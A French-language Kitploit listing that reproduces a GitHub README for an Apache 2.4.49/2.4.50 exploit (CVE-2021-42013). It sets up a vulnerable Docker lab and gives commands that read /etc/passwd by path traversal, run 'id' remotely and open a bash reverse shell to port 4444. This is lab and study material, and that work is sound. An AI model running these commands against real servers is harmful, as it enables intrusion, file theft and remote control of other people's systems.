Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-42013 — Exploit pour Apache 2.4.49/2.4.50 traversée de chemin et RCE (CVE-2021-42013). Comprend une configuration Docker et un script pour tester la traversée de chemin, exécuter des commandes et obtenir un shell inverse. | Kitploit
Outils/GitHubGitHub/asepsaepdin/cve-2021-42013
Analyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationOutil d'Accès à DistanceLabs et Pratique
GitHubasepsaepdin/cve-2021-42013

CVE-2021-42013

Exploit pour Apache 2.4.49/2.4.50 traversée de chemin et RCE (CVE-2021-42013). Comprend une configuration Docker et un script pour tester la traversée de chemin, exécuter des commandes et obtenir un shell inverse.

Voir le dépôt
11il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-42013 - Contournement de chemin et exécution de code à distance (RCE) sur Apache 2.4.50


⚠️ À des fins éducatives et de recherche en sécurité autorisées uniquement

Auteurs de l'exploit original

Très reconnaissant à l'auteur original du PoC Walnut Security Services Pvt. Ltd

Description

Un attaquant pourrait utiliser une attaque de contournement de chemin pour mapper des URL vers des fichiers en dehors des répertoires configurés par des directives de type Alias. Si des fichiers en dehors de ces répertoires ne sont pas protégés par la configuration par défaut habituelle « require all denied », ces requêtes peuvent réussir. Si des scripts CGI sont également activés pour ces chemins aliasés, cela pourrait permettre l'exécution de code à distance. Ce problème n'affecte que Apache 2.4.49 et Apache 2.4.50, pas les versions antérieures.


Guides étape par étape

Tout d'abord, clonez le dépôt

root@kitploit:~
git clone https://github.com/asepsaepdin/CVE-2021-42013.git
  • Changez de répertoire

    root@kitploit:~
    cd CVE-2021-42013
    
  • Construisez le conteneur vulnérable

    root@kitploit:~
    docker build -t CVE-2021-42013 .
    
  • Exécutez le conteneur éphémère

    root@kitploit:~
    docker run --rm -it --name CVE-2021-42013 CVE-2021-42013
    
  • Vérifiez l'adresse IP du conteneur

    root@kitploit:~
    docker inspect CVE-2021-42013 | grep "IPAddress"
    
  • Donnez la permission d'exécution au script

    root@kitploit:~
    chmod +x cve-2021-42013.sh
    
  • Pour tester et confirmer le contournement de chemin, un répertoire valide doit être découvert, configuré ici comme /icons. Ainsi, exécuter la commande suivante déclenchera la vulnérabilité de contournement de chemin et affichera le contenu de /etc/passwd :

    root@kitploit:~
    ./cve-2021-42013.sh 172.17.0.3/icons /etc/passwd
    
  • Pour tester et confirmer l'exécution de code à distance, CGI doit être configuré et activé, ce qui est le cas ici. Ainsi, exécuter la commande suivante déclenchera l'exécution de code à distance et affichera la sortie de la commande id :

    root@kitploit:~
    ./cve-2021-42013.sh 172.17.0.3 /bin/bash id
    
  • Du point de vue d'un attaquant, l'exécution de code à distance est cruciale pour obtenir un accès à un shell interactif. Ainsi, exécuter la commande suivante déclenchera un reverse shell conventionnel sur TCP basé sur bash vers le système de l'attaquant sur le port 4444/tcp :

    root@kitploit:~
    ./cve-2021-42013.sh 172.17.0.4 /bin/bash 'bash -i >& /dev/tcp/172.17.0.1/4444 0>&1'
    
    root@kitploit:~
    nc -nlvp 4444
    

  • Crédits

    • https://github.com/walnutsecurity/cve-2021-42013
    • https://nvd.nist.gov/vuln/detail/CVE-2021-42013
    • https://www.exploit-db.com/docs/50552
    • https://www.exploit-db.com/exploits/50406
    Télécharger l’outil